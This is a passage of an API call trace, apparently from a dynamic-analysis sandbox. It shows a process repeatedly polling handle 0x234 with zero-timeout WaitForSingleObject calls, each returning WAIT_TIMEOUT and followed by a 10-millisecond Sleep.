WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.433] Sleep (dwMilliseconds=0xa) [0225.507] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.507] Sleep (dwMilliseconds=0xa) [0225.553] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.553] Sleep (dwMilliseconds=0xa) [0225.594] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.594] Sleep (dwMilliseconds=0xa) [0225.631] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.631] Sleep (dwMilliseconds=0xa) [0225.687] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.687] Sleep (dwMilliseconds=0xa) [0225.769] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.769] Sleep (dwMilliseconds=0xa) [0225.844] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.844] Sleep (dwMilliseconds=0xa) [0225.916] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0225.916] Sleep (dwMilliseconds=0xa) [0226.245] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.246] Sleep (dwMilliseconds=0xa) [0226.338] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.339] Sleep (dwMilliseconds=0xa) [0226.437] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.437] Sleep (dwMilliseconds=0xa) [0226.529] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.529] Sleep (dwMilliseconds=0xa) [0226.617] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.617] Sleep (dwMilliseconds=0xa) [0226.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.694] Sleep (dwMilliseconds=0xa) [0226.766] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.766] Sleep (dwMilliseconds=0xa) [0226.851] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.852] Sleep (dwMilliseconds=0xa) [0226.909] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.909] Sleep (dwMilliseconds=0xa) [0226.990] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0226.990] Sleep (dwMilliseconds=0xa) [0227.047] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.047] Sleep (dwMilliseconds=0xa) [0227.344] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.344] Sleep (dwMilliseconds=0xa) [0227.435] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.435] Sleep (dwMilliseconds=0xa) [0227.505] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.505] Sleep (dwMilliseconds=0xa) [0227.577] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.577] Sleep (dwMilliseconds=0xa) [0227.672] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.672] Sleep (dwMilliseconds=0xa) [0227.756] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.756] Sleep (dwMilliseconds=0xa) [0227.841] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.841] Sleep (dwMilliseconds=0xa) [0227.921] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0227.921] Sleep (dwMilliseconds=0xa) [0228.007] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.007] Sleep (dwMilliseconds=0xa) [0228.242] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.242] Sleep (dwMilliseconds=0xa) [0228.377] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.377] Sleep (dwMilliseconds=0xa) [0228.502] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.502] Sleep (dwMilliseconds=0xa) [0228.606] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.606] Sleep (dwMilliseconds=0xa) [0228.706] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.706] Sleep (dwMilliseconds=0xa) [0228.806] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.806] Sleep (dwMilliseconds=0xa) [0228.856] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.856] Sleep (dwMilliseconds=0xa) [0228.925] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0228.925] Sleep (dwMilliseconds=0xa) [0229.013] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.013] Sleep (dwMilliseconds=0xa) [0229.327] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.328] Sleep (dwMilliseconds=0xa) [0229.403] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.403] Sleep (dwMilliseconds=0xa) [0229.579] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.579] Sleep (dwMilliseconds=0xa) [0229.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.667] Sleep (dwMilliseconds=0xa) [0229.777] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.777] Sleep (dwMilliseconds=0xa) [0229.853] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.853] Sleep (dwMilliseconds=0xa) [0229.941] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0229.941] Sleep (dwMilliseconds=0xa) [0230.022] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.022] Sleep (dwMilliseconds=0xa) [0230.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.304] Sleep (dwMilliseconds=0xa) [0230.394] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.394] Sleep (dwMilliseconds=0xa) [0230.467] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.468] Sleep (dwMilliseconds=0xa) [0230.511] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.512] Sleep (dwMilliseconds=0xa) [0230.586] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.586] Sleep (dwMilliseconds=0xa) [0230.647] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.647] Sleep (dwMilliseconds=0xa) [0230.721] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.721] Sleep (dwMilliseconds=0xa) [0230.836] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.836] Sleep (dwMilliseconds=0xa) [0230.886] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.887] Sleep (dwMilliseconds=0xa) [0230.928] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.928] Sleep (dwMilliseconds=0xa) [0230.968] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0230.968] Sleep (dwMilliseconds=0xa) [0231.063] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.063] Sleep (dwMilliseconds=0xa) [0231.282] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.283] Sleep (dwMilliseconds=0xa) [0231.340] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.341] Sleep (dwMilliseconds=0xa) [0231.424] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.424] Sleep (dwMilliseconds=0xa) [0231.505] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.505] Sleep (dwMilliseconds=0xa) [0231.583] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.583] Sleep (dwMilliseconds=0xa) [0231.669] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.669] Sleep (dwMilliseconds=0xa) [0231.769] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.770] Sleep (dwMilliseconds=0xa) [0231.857] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.857] Sleep (dwMilliseconds=0xa) [0231.920] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.920] Sleep (dwMilliseconds=0xa) [0231.987] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0231.987] Sleep (dwMilliseconds=0xa) [0232.074] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.074] Sleep (dwMilliseconds=0xa) [0232.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.329] Sleep (dwMilliseconds=0xa) [0232.418] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.418] Sleep (dwMilliseconds=0xa) [0232.488] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.488] Sleep (dwMilliseconds=0xa) [0232.558] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.558] Sleep (dwMilliseconds=0xa) [0232.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.667] Sleep (dwMilliseconds=0xa) [0232.738] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.738] Sleep (dwMilliseconds=0xa) [0232.830] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.830] Sleep (dwMilliseconds=0xa) [0232.908] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.908] Sleep (dwMilliseconds=0xa) [0232.989] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0232.989] Sleep (dwMilliseconds=0xa) [0233.030] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.030] Sleep (dwMilliseconds=0xa) [0233.330] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.330] Sleep (dwMilliseconds=0xa) [0233.474] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.474] Sleep (dwMilliseconds=0xa) [0233.575] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.575] Sleep (dwMilliseconds=0xa) [0233.674] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.674] Sleep (dwMilliseconds=0xa) [0233.760] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.760] Sleep (dwMilliseconds=0xa) [0233.833] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.833] Sleep (dwMilliseconds=0xa) [0233.916] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0233.916] Sleep (dwMilliseconds=0xa) [0234.085] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.085] Sleep (dwMilliseconds=0xa) [0234.331] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.331] Sleep (dwMilliseconds=0xa) [0234.412] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.412] Sleep (dwMilliseconds=0xa) [0234.485] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.485] Sleep (dwMilliseconds=0xa) [0234.551] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.552] Sleep (dwMilliseconds=0xa) [0234.775] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.775] Sleep (dwMilliseconds=0xa) [0234.843] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.843] Sleep (dwMilliseconds=0xa) [0234.896] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.897] Sleep (dwMilliseconds=0xa) [0234.990] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0234.990] Sleep (dwMilliseconds=0xa) [0235.071] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.071] Sleep (dwMilliseconds=0xa) [0235.301] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.301] Sleep (dwMilliseconds=0xa) [0235.381] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.381] Sleep (dwMilliseconds=0xa) [0235.464] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.464] Sleep (dwMilliseconds=0xa) [0235.518] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.518] Sleep (dwMilliseconds=0xa) [0235.557] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.558] Sleep (dwMilliseconds=0xa) [0235.727] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.728] Sleep (dwMilliseconds=0xa) [0235.852] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.852] Sleep (dwMilliseconds=0xa) [0235.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0235.977] Sleep (dwMilliseconds=0xa) [0236.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.055] Sleep (dwMilliseconds=0xa) [0236.258] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.258] Sleep (dwMilliseconds=0xa) [0236.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.304] Sleep (dwMilliseconds=0xa) [0236.372] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.372] Sleep (dwMilliseconds=0xa) [0236.546] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.546] Sleep (dwMilliseconds=0xa) [0236.612] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.612] Sleep (dwMilliseconds=0xa) [0236.740] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.740] Sleep (dwMilliseconds=0xa) [0236.813] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.813] Sleep (dwMilliseconds=0xa) [0236.893] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.893] Sleep (dwMilliseconds=0xa) [0236.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0236.977] Sleep (dwMilliseconds=0xa) [0237.064] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.064] Sleep (dwMilliseconds=0xa) [0237.264] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.264] Sleep (dwMilliseconds=0xa) [0237.338] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.338] Sleep (dwMilliseconds=0xa) [0237.434] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.434] Sleep (dwMilliseconds=0xa) [0237.490] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.490] Sleep (dwMilliseconds=0xa) [0237.615] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.615] Sleep (dwMilliseconds=0xa) [0237.697] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.697] Sleep (dwMilliseconds=0xa) [0237.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.790] Sleep (dwMilliseconds=0xa) [0237.863] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.863] Sleep (dwMilliseconds=0xa) [0237.975] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0237.975] Sleep (dwMilliseconds=0xa) [0238.046] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.046] Sleep (dwMilliseconds=0xa) [0238.091] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.091] Sleep (dwMilliseconds=0xa) [0238.299] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.300] Sleep (dwMilliseconds=0xa) [0238.393] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.393] Sleep (dwMilliseconds=0xa) [0238.477] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.478] Sleep (dwMilliseconds=0xa) [0238.559] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.559] Sleep (dwMilliseconds=0xa) [0238.630] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.630] Sleep (dwMilliseconds=0xa) [0238.671] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.671] Sleep (dwMilliseconds=0xa) [0238.766] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.766] Sleep (dwMilliseconds=0xa) [0238.873] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.873] Sleep (dwMilliseconds=0xa) [0238.947] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0238.947] Sleep (dwMilliseconds=0xa) [0239.070] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.070] Sleep (dwMilliseconds=0xa) [0239.327] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.327] Sleep (dwMilliseconds=0xa) [0239.423] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.423] Sleep (dwMilliseconds=0xa) [0239.514] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.515] Sleep (dwMilliseconds=0xa) [0239.599] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.599] Sleep (dwMilliseconds=0xa) [0239.862] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0239.862] Sleep (dwMilliseconds=0xa) [0240.038] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.038] Sleep (dwMilliseconds=0xa) [0240.260] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.260] Sleep (dwMilliseconds=0xa) [0240.377] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.377] Sleep (dwMilliseconds=0xa) [0240.469] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.470] Sleep (dwMilliseconds=0xa) [0240.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.543] Sleep (dwMilliseconds=0xa) [0240.593] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.593] Sleep (dwMilliseconds=0xa) [0240.671] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.672] Sleep (dwMilliseconds=0xa) [0240.743] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.743] Sleep (dwMilliseconds=0xa) [0240.786] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.786] Sleep (dwMilliseconds=0xa) [0240.848] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.848] Sleep (dwMilliseconds=0xa) [0240.936] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0240.936] Sleep (dwMilliseconds=0xa) [0241.023] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.023] Sleep (dwMilliseconds=0xa) [0241.206] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.207] Sleep (dwMilliseconds=0xa) [0241.265] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.265] Sleep (dwMilliseconds=0xa) [0241.319] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.319] Sleep (dwMilliseconds=0xa) [0241.397] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.398] Sleep (dwMilliseconds=0xa) [0241.483] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.483] Sleep (dwMilliseconds=0xa) [0241.614] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.614] Sleep (dwMilliseconds=0xa) [0241.734] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.734] Sleep (dwMilliseconds=0xa) [0241.824] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.824] Sleep (dwMilliseconds=0xa) [0241.872] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.872] Sleep (dwMilliseconds=0xa) [0241.932] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0241.932] Sleep (dwMilliseconds=0xa) [0242.007] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.007] Sleep (dwMilliseconds=0xa) [0242.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.282] Sleep (dwMilliseconds=0xa) [0242.365] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.365] Sleep (dwMilliseconds=0xa) [0242.443] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.443] Sleep (dwMilliseconds=0xa) [0242.486] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.486] Sleep (dwMilliseconds=0xa) [0242.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.555] Sleep (dwMilliseconds=0xa) [0242.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.667] Sleep (dwMilliseconds=0xa) [0242.743] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.743] Sleep (dwMilliseconds=0xa) [0242.815] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.815] Sleep (dwMilliseconds=0xa) [0242.940] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0242.940] Sleep (dwMilliseconds=0xa) [0243.013] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.013] Sleep (dwMilliseconds=0xa) [0243.265] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.265] Sleep (dwMilliseconds=0xa) [0243.362] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.362] Sleep (dwMilliseconds=0xa) [0243.436] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.437] Sleep (dwMilliseconds=0xa) [0243.536] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.536] Sleep (dwMilliseconds=0xa) [0243.619] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.619] Sleep (dwMilliseconds=0xa) [0243.702] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.702] Sleep (dwMilliseconds=0xa) [0243.812] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.812] Sleep (dwMilliseconds=0xa) [0243.885] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.885] Sleep (dwMilliseconds=0xa) [0243.975] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0243.975] Sleep (dwMilliseconds=0xa) [0244.083] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.083] Sleep (dwMilliseconds=0xa) [0244.314] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.314] Sleep (dwMilliseconds=0xa) [0244.376] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.376] Sleep (dwMilliseconds=0xa) [0244.494] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.494] Sleep (dwMilliseconds=0xa) [0244.583] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.583] Sleep (dwMilliseconds=0xa) [0244.713] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.713] Sleep (dwMilliseconds=0xa) [0244.940] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0244.940] Sleep (dwMilliseconds=0xa) [0245.061] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.061] Sleep (dwMilliseconds=0xa) [0245.254] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.254] Sleep (dwMilliseconds=0xa) [0245.345] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.345] Sleep (dwMilliseconds=0xa) [0245.435] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.436] Sleep (dwMilliseconds=0xa) [0245.538] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.538] Sleep (dwMilliseconds=0xa) [0245.629] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.629] Sleep (dwMilliseconds=0xa) [0245.704] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.704] Sleep (dwMilliseconds=0xa) [0245.744] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.744] Sleep (dwMilliseconds=0xa) [0245.815] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.815] Sleep (dwMilliseconds=0xa) [0245.894] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.894] Sleep (dwMilliseconds=0xa) [0245.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0245.977] Sleep (dwMilliseconds=0xa) [0246.022] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.022] Sleep (dwMilliseconds=0xa) [0246.089] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.090] Sleep (dwMilliseconds=0xa) [0246.309] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.309] Sleep (dwMilliseconds=0xa) [0246.373] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.373] Sleep (dwMilliseconds=0xa) [0246.469] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.469] Sleep (dwMilliseconds=0xa) [0246.545] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.545] Sleep (dwMilliseconds=0xa) [0246.597] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.597] Sleep (dwMilliseconds=0xa) [0246.659] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.659] Sleep (dwMilliseconds=0xa) [0246.765] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.766] Sleep (dwMilliseconds=0xa) [0246.863] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.863] Sleep (dwMilliseconds=0xa) [0246.937] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0246.937] Sleep (dwMilliseconds=0xa) [0247.007] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.007] Sleep (dwMilliseconds=0xa) [0247.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.055] Sleep (dwMilliseconds=0xa) [0247.108] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.108] Sleep (dwMilliseconds=0xa) [0247.277] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.277] Sleep (dwMilliseconds=0xa) [0247.445] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.445] Sleep (dwMilliseconds=0xa) [0247.519] WaitForSingleObject (hHandle=0x234, 